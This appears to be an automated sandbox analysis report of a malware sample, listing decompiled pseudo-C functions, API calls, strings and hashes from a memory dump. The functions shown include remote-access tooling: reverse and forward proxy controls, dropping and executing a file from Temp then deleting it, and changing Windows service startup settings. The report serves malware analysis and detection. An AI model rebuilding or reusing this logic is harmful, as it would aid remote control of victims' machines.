0x0044eb1b
0x00000000
0x0044eb34
0x0044eb34
0x0044eb4d
0x0044eb4d
0x0044eb1b
0x0044eaef
0x0044eade
0x0044eb55
0x0044eb5a
0x0044eab9
0x0044ea9f
0x0044ea83
0x0044ea48
0x0044ea34
0x0044eb61
0x0044eb67
0x0044ea0f
0x0044e950
0x0044e91c
0x0044eb69
0x0044eb7c

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E981
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA04
__alloca_probe_16.LIBCMT ref: 0044EA3C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044EBAE,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA97
__alloca_probe_16.LIBCMT ref: 0044EAE6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EAAE

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EB2A
__freea.LIBCMT ref: 0044EB55
__freea.LIBCMT ref: 0044EB61

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
Instruction ID: 57d3b8f3912e80867dbd5bea15d3c0571bce0196d8e9b81a223875e0514adfa6
Opcode Fuzzy Hash: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
Instruction Fuzzy Hash: 9791C2B1E002569AEF208E66C841AAFBBA5FF09754F14066BE805E7281D739DC418769

Uniqueness

Uniqueness Score: -1.00%

Function 0043E9CE, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0043E9CE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46a00c; // 0xee31ea10
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00441CE2(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E0043E118(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E0043F98C(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xb94f
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E004415D4(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0043698A();
									asm("int3");
									_t169 =  *0x46b508; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E0043DE25(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E004493AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x457410, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E004337C1( &_v528,  *0x46a170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x457350; // 0x40dd8c
									 *0x453474(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46a2a8;
										if(_t228 != 0x46a2a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E004401F5( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E004401F5( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xb94f
												E004401F5( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xb94f
										E004401F5( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E004401F5(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E0042FD1B(_v8 ^ _t262);
				}
				L47:
			}

0x0043e9d1
0x0043e9d9
0x0043e9e0
0x0043e9e3
0x0043e9e4
0x0043e9e7
0x0043e9eb
0x0043e9ec
0x0043e9ef
0x0043e9ff
0x0043ea0b
0x0043ea22
0x0043ea27
0x0043ea2c
0x0043ea41
0x0043ea44
0x0043ea44
0x0043ea47
0x0043ea4d
0x0043ea56
0x0043ea58
0x0043ea5b
0x0043ea62
0x0043ea65
0x0043ea6b
0x00000000
0x00000000
0x0043ea6d
0x0043ea71
0x0043ea9a
0x0043ea9a
0x0043ea73
0x0043ea73
0x0043ea77
0x0043ea7b
0x0043ea82
0x0043ea88
0x00000000
0x0043ea8a
0x0043ea8a
0x0043ea8d
0x0043ea90
0x0043ea98
0x00000000
0x00000000
0x00000000
0x00000000
0x0043ea98
0x0043ea88
0x0043eaa7
0x0043eaa7
0x0043eaa9
0x0043eaaf
0x0043eab5
0x0043eab8
0x0043eab8
0x0043eabb
0x0043eabe
0x0043eabe
0x0043eace
0x0043eadc
0x0043eae1
0x0043eae8
0x0043eaea
0x00000000
0x0043eaf0
0x0043eaf6
0x0043eafc
0x0043eb03
0x0043eb09
0x0043eb0c
0x0043eb12
0x0043eb1f
0x0043eb26
0x0043eb2b
0x0043eb2e
0x0043eb30
0x0043ed89
0x0043ed8f
0x0043ed90
0x0043ed91
0x0043ed92
0x0043ed93
0x0043ed94
0x0043ed99
0x0043ed9a
0x0043ed9f
0x0043eb36
0x0043eb36
0x0043eb44
0x0043eb47
0x0043eb62
0x0043eb69
0x0043eb6f
0x0043eb75
0x0043eb49
0x0043eb49
0x0043eb51
0x00000000
0x0043eb53
0x0043eb53
0x0043eb59
0x0043eb59
0x0043eb51
0x0043eb7c
0x0043eb7f
0x0043ec9c
0x0043ec9f
0x0043ecac
0x0043ecaf
0x0043ecb7
0x0043ecb7
0x0043eca1
0x0043eca7
0x0043eca7
0x0043eb85
0x0043eb85
0x0043eb8b
0x0043eb93
0x0043eb95
0x0043eb98
0x0043eba1
0x0043ebaa
0x0043ebb0
0x0043ebb0
0x0043ebb3
0x0043ebb5
0x00000000
0x00000000
0x0043ebb7
0x0043ebbd
0x0043ebbe
0x0043ebc9
0x0043ebd1
0x0043ebd9
0x0043ebdc
0x0043ebdf
0x0043ebe5
0x0043ebeb
0x0043ebf1
0x0043ebf7
0x0043ebfa
0x00000000
0x00000000
0x0043ebfc
0x0043ec21
0x0043ec21
0x0043ec24
0x0043ec28
0x0043ec41
0x0043ec46
0x0043ec49
0x0043ec4b
0x0043ec51
0x0043ec8c
0x0043ec53
0x0043ec53
0x0043ec58
0x0043ec60
0x0043ec61
0x0043ec61
0x0043ec78
0x0043ec7f
0x0043ec82
0x0043ec87
0x0043ec87
0x0043ec8f
0x0043ec92
0x0043ec92
0x0043ec97
0x00000000
0x0043ec97
0x0043ebfe
0x0043ec00
0x0043ec05
0x0043ec0b
0x0043ec14
0x0043ec1d
0x0043ec1d
0x00000000
0x0043ec00
0x0043ecba
0x0043ecba
0x0043ecbe
0x0043ecc6
0x0043eccc
0x0043eccf
0x0043ecd5
0x0043ecd7
0x0043ed17
0x0043ed1d
0x0043ed24
0x0043ed24
0x0043ed2a
0x0043ed2e
0x00000000
0x0043ed30
0x0043ed30
0x0043ed34
0x0043ed39
0x0043ed3d
0x0043ed42
0x0043ed49
0x0043ed57
0x0043ed5d
0x0043ed60
0x0043ed60
0x0043ed2e
0x0043ed6f
0x0043ed77
0x0043ed80
0x0043ecd9
0x0043ecdf
0x0043ece2
0x0043ece9
0x0043ecfb
0x0043ed02
0x0043ed0f
0x00000000
0x0043ed0f
0x00000000
0x0043ecd7
0x0043eb30
0x0043eaab
0x00000000
0x0043eaab
0x00000000
0x0043eaa9
0x0043eaa2
0x0043eaa4
0x0043eaa4
0x00000000
0x0043ea2e
0x0043ea2e
0x0043ea30
0x0043ea40
0x0043ea40
0x00000000

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

_memcmp.LIBVCRUNTIME ref: 0043EC78
_free.LIBCMT ref: 0043ECE9
_free.LIBCMT ref: 0043ED02
_free.LIBCMT ref: 0043ED34
_free.LIBCMT ref: 0043ED3D
_free.LIBCMT ref: 0043ED49

Strings

C, xrefs: 0043EB36

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 396cf42111b30fdd357e3ce95326dce3266439ae5a60f4affbd4cac6878eaba6
Instruction ID: 95dbb2c384f2b4054f08a0819f6185acf069c750c5e84a8d12f5530653077751
Opcode Fuzzy Hash: 396cf42111b30fdd357e3ce95326dce3266439ae5a60f4affbd4cac6878eaba6
Instruction Fuzzy Hash: 81B12B7590221ADFDB24DF19C884AAEB7B4FF08314F1055AEE94AA7390D735AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEA8, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040EEA8(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t24;
				void* _t30;
				char* _t32;
				char* _t35;
				intOrPtr _t48;
				char* _t49;
				char* _t56;
				char* _t61;
				void* _t64;
				intOrPtr _t117;
				void* _t121;
				void* _t124;
				void* _t126;
				void* _t127;
				void* _t129;
				signed int _t131;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t140;

				_t142 = __eflags;
				_t107 = __edx;
				_push(_t64);
				_t117 = _a4;
				E004020EC(_t64,  &_v76, __edx, __eflags, _t117 + 0x1c);
				SetEvent( *(_t117 + 0x34));
				_t24 = E00401F95( &_v80);
				E004042A6( &_v80,  &_v56, 4, 0xffffffff);
				_t134 = (_t131 & 0xfffffff8) - 0x3c;
				E004020EC(0x46c238, _t134, _t107, _t142, 0x46c238);
				_t135 = _t134 - 0x18;
				E004020EC(0x46c238, _t135, _t107, _t142,  &_v72);
				_t30 = E00417478( &_v112, _t107);
				_t136 = _t135 + 0x30;
				_t121 =  *_t24 - 0x46;
				if(_t121 == 0) {
					E00401E49( &_v88, _t107, __eflags, 1);
					_t32 = E00402489();
					E00401F95(E00401E49( &_v92, _t107, __eflags, 1));
					_t108 = _t32;
					_t35 = E0040F69B();
					_t123 = _t35;
					__eflags = _t35;
					if(__eflags == 0) {
						_t124 = _t136 - 0x18;
						_push("1");
						L19:
						_t107 = E00402FB7( &_v32, E00401E49( &_v88, _t108, __eflags, 0), 0x46c238);
						E00405343(0x46c238, _t124, _t37, _t117, __eflags);
						_push(0x85);
						E00404AA4(0x46c238, _t117, _t37, __eflags);
						E00401FC7();
						L20:
						E00401E74( &_v108, _t107);
						E00401FC7();
						E00401FC7();
						return 0;
					}
					 *0x46bd3c = E0040F931(_t123, "StartForward");
					 *0x46bd38 = E0040F931(_t123, "StartReverse");
					 *0x46bd40 = E0040F931(_t123, "StopForward");
					_t48 = E0040F931(_t123, "StopReverse");
					_t108 = "GetDirectListeningPort";
					 *0x46bd48 = _t48;
					_t49 = E0040F931(_t123, "GetDirectListeningPort");
					__eflags =  *0x46bd3c;
					 *0x46bd44 = _t49;
					if(__eflags == 0) {
						L17:
						_t124 = _t136 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x46bd38;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46bd40;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t49;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46bd4c = 1;
					E004020EC(0x46c238, _t136 - 0x18, "GetDirectListeningPort", __eflags, E00401E49( &_v88, "GetDirectListeningPort", __eflags, 0));
					_push(0x76);
					L10:
					E00404AA4(0x46c238, _t117, _t108, __eflags);
					goto L20;
				}
				_t126 = _t121 - 1;
				if(_t126 == 0) {
					_t56 =  *0x46bd3c(E00436769(_t53, E00401F95(E00401E49( &_v88, _t107, __eflags, 0))));
					_t140 = _t136 - 0x14;
					L9:
					_t108 = _t56;
					E00417226(0x46c238, _t140, _t56);
					_push(0x77);
					goto L10;
				}
				_t127 = _t126 - 1;
				if(_t127 == 0) {
					__imp__#12( *0x46c78c);
					_t61 =  *0x46bd38(_t30, E00436769(_t58, E00401F95(E00401E49( &_v92, _t107, __eflags, 0))) & 0x0000ffff);
					__eflags = _t61;
					_t105 =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					 *0x46bd4d =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					_t108 = _t61;
					E00417226(0x46c238, _t136 - 0x10, _t61);
					_push(0x78);
					goto L10;
				}
				_t129 = _t127 - 1;
				if(_t129 == 0) {
					_t56 =  *0x46bd40();
					_t140 = _t136 - 0x18;
					goto L9;
				}
				if(_t129 == 1) {
					 *0x46bd48();
					 *0x46bd4d = 0;
				}
				goto L20;
			}

0x0040eea8
0x0040eea8
0x0040eeb5
0x0040eeb8
0x0040eebf
0x0040eec7
0x0040eed1
0x0040eee5
0x0040eeea
0x0040eef5
0x0040eefa
0x0040ef04
0x0040ef0d
0x0040ef12
0x0040ef15
0x0040ef18
0x0040efee
0x0040eff5
0x0040f009
0x0040f00e
0x0040f012
0x0040f017
0x0040f019
0x0040f01b
0x0040f0c8
0x0040f0ca
0x0040f0cf
0x0040f0e7
0x0040f0eb
0x0040f0f1
0x0040f0f8
0x0040f101
0x0040f106
0x0040f10a
0x0040f113
0x0040f11c
0x0040f129
0x0040f129
0x0040f032
0x0040f043
0x0040f054
0x0040f05b
0x0040f060
0x0040f065
0x0040f06c
0x0040f071
0x0040f078
0x0040f07d
0x0040f0b9
0x0040f0bc
0x0040f0be
0x00000000
0x0040f0be
0x0040f07f
0x0040f086
0x00000000
0x00000000
0x0040f088
0x0040f08f
0x00000000
0x00000000
0x0040f091
0x0040f093
0x00000000
0x00000000
0x0040f09b
0x0040f0ad
0x0040f0b2
0x0040efdc
0x0040efde
0x00000000
0x0040efde
0x0040ef1e
0x0040ef21
0x0040efc8
0x0040efce
0x0040efd1
0x0040efd1
0x0040efd5
0x0040efda
0x00000000
0x0040efda
0x0040ef27
0x0040ef2a
0x0040ef5d
0x0040ef83
0x0040ef93
0x0040ef95
0x0040ef9b
0x0040efa1
0x0040efa5
0x0040efaa
0x00000000
0x0040efaa
0x0040ef2c
0x0040ef2f
0x0040ef4c
0x0040ef52
0x00000000
0x0040ef52
0x0040ef34
0x0040ef3a
0x0040ef40
0x0040ef40
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 0040EEC7
inet_ntoa.WS2_32 ref: 0040EF5D

Strings

GetDirectListeningPort, xrefs: 0040F060
StartReverse, xrefs: 0040F02D
StopReverse, xrefs: 0040F04F
StartForward, xrefs: 0040F021
StopForward, xrefs: 0040F03E

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 03d07ba58d00eb483986e3bfd8ae2d6de7d9a0680fa2b323185ff683fb1ebc7a
Instruction ID: 5be76a892bc31f628a71e06d9e43f1a7a98cf15a787e29941cb9cfc22c663fa8
Opcode Fuzzy Hash: 03d07ba58d00eb483986e3bfd8ae2d6de7d9a0680fa2b323185ff683fb1ebc7a
Instruction Fuzzy Hash: A351D671A043019BC614BB36D85A66E36A59B81308F40493FF941AB6E2EF7C9D49C7CF

Uniqueness

Uniqueness Score: -1.00%

Function 00413D1B, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00413D1B(void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t87;
				void* _t90;

				_t93 = __eflags;
				_t33 = E00402084(_t60,  &_v136, "\\");
				_t86 = E004075C2(_t60,  &_v112, E0043988A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
				E00402F93(_t60,  &_v28, _t35, _t93,  &_a4);
				E00401FC7();
				_t68 =  &_v136;
				E00401FC7();
				_push(_t68);
				_push(_t68);
				_t41 = E00413F58(E0040D544( &_v316, _t35, _t93, E00401F95( &_v28), 0x10),  &_v316);
				_t94 = _t41;
				if(_t41 == 0) {
					E00402084(_t60, _t90 - 0x18, 0x45f6bc);
					_push(0x6f);
					_t73 = 0x46c800;
					goto L6;
				} else {
					_t86 =  &_a28;
					E00413F68( &_v316,  &_a28, _t94);
					E0040D4F5( &_v316,  &_a28, _t94);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00401F95( &_v28);
					asm("movaps xmm0, [0x466090]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t96 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402084(_t60, _t90, 0x45f6bc);
						_push(0x70);
						E00404AA4(_t60, 0x46c800,  &_a28, _t96);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00401F95( &_v28));
					}
					_t97 = _t60 - 1;
					if(_t60 == 1) {
						E00402084(_t60, _t90 - 0x18, 0x45f6bc);
						_push(0x6e);
						_t73 = 0x46c800;
						L6:
						E00404AA4(_t60, _t73, _t86, _t97);
					}
				}
				E0040CC42(_t60,  &_v316, 0x45f6bc);
				E00401FC7();
				E00401FC7();
				return E00401FC7();
			}

0x00413d1b
0x00413d36
0x00413d52
0x00413d57
0x00413d60
0x00413d65
0x00413d6b
0x00413d70
0x00413d71
0x00413d8e
0x00413d93
0x00413d95
0x00413e56
0x00413e5b
0x00413e5d
0x00000000
0x00413d9b
0x00413d9b
0x00413da4
0x00413daf
0x00413db4
0x00413dbb
0x00413dbf
0x00413dc6
0x00413dcd
0x00413dd2
0x00413dd9
0x00413de0
0x00413df6
0x00413df9
0x00413dfd
0x00413e05
0x00413e0a
0x00413e0e
0x00413e18
0x00413e21
0x00413e30
0x00413e30
0x00413e36
0x00413e39
0x00413e41
0x00413e46
0x00413e48
0x00413e62
0x00413e62
0x00413e62
0x00413e39
0x00413e6d
0x00413e75
0x00413e7d
0x00413e90

APIs

Part of subcall function 00413F68: __EH_prolog.LIBCMT ref: 00413F6D

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0045F6BC), ref: 00413E18
CloseHandle.KERNEL32(00000000), ref: 00413E21
DeleteFileA.KERNEL32(00000000), ref: 00413E30
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00413DE4

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

<, xrefs: 00413DBF
Temp, xrefs: 00413D3C
@, xrefs: 00413DC6

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$Temp
API String ID: 1704390241-1032778388
Opcode ID: 8235d64f8fb0ed999a86fc3c1c9360a3b11d0c2a0435fb4322cd5866914dfd3f
Instruction ID: d544d44dfc388409d2ca5176df872b457ecab726ff8bac35079d4976b4930393
Opcode Fuzzy Hash: 8235d64f8fb0ed999a86fc3c1c9360a3b11d0c2a0435fb4322cd5866914dfd3f
Instruction Fuzzy Hash: B1417C3190020A9BCB14FB65CD56AFE7774AF10309F40427EF505760E2EF781A8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 004165DD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67
serviceCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004165DD(signed char __ecx, char _a4) {
				signed char _v5;
				void* _t7;
				signed int _t11;
				void* _t17;
				short* _t21;
				signed int _t24;
				int _t25;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_t21 = 0;
				_v5 = __ecx;
				_t7 = OpenSCManagerW(0, 0, 2);
				_t2 =  &_a4; // 0x415d21
				_t24 = _t2;
				_t31 = _t7;
				_t28 = OpenServiceW(_t31, E00401EEB(_t24), 2);
				if(_t28 != 0) {
					_t25 = _t24 | 0xffffffff;
					_t11 = _v5 & 0x000000ff;
					if(_t11 == 0) {
						_push(4);
						goto L8;
					} else {
						_t17 = _t11 - 1;
						if(_t17 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t17 == 1) {
								_push(3);
								L8:
								_pop(_t25);
							}
						}
					}
					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
					CloseServiceHandle(_t31);
					CloseServiceHandle(_t28);
				} else {
					CloseServiceHandle(_t31);
				}
				E00401EF0();
				return _t21;
			}

0x004165e0
0x004165e6
0x004165e8
0x004165ed
0x004165f5
0x004165f5
0x004165f8
0x00416607
0x0041660b
0x0041661a
0x0041661d
0x0041661f
0x00416633
0x00000000
0x00416621
0x00416621
0x00416624
0x0041662f
0x00000000
0x00416626
0x00416629
0x0041662b
0x00416635
0x00416635
0x00416635
0x00416629
0x00416624
0x00416652
0x00416655
0x00416658
0x0041660d
0x0041660e
0x0041660e
0x0041665d
0x0041666a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00415D21,00000000), ref: 004165ED
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00415D21,00000000), ref: 00416601
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 0041660E
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00415D21,00000000), ref: 00416643
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416655
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416658
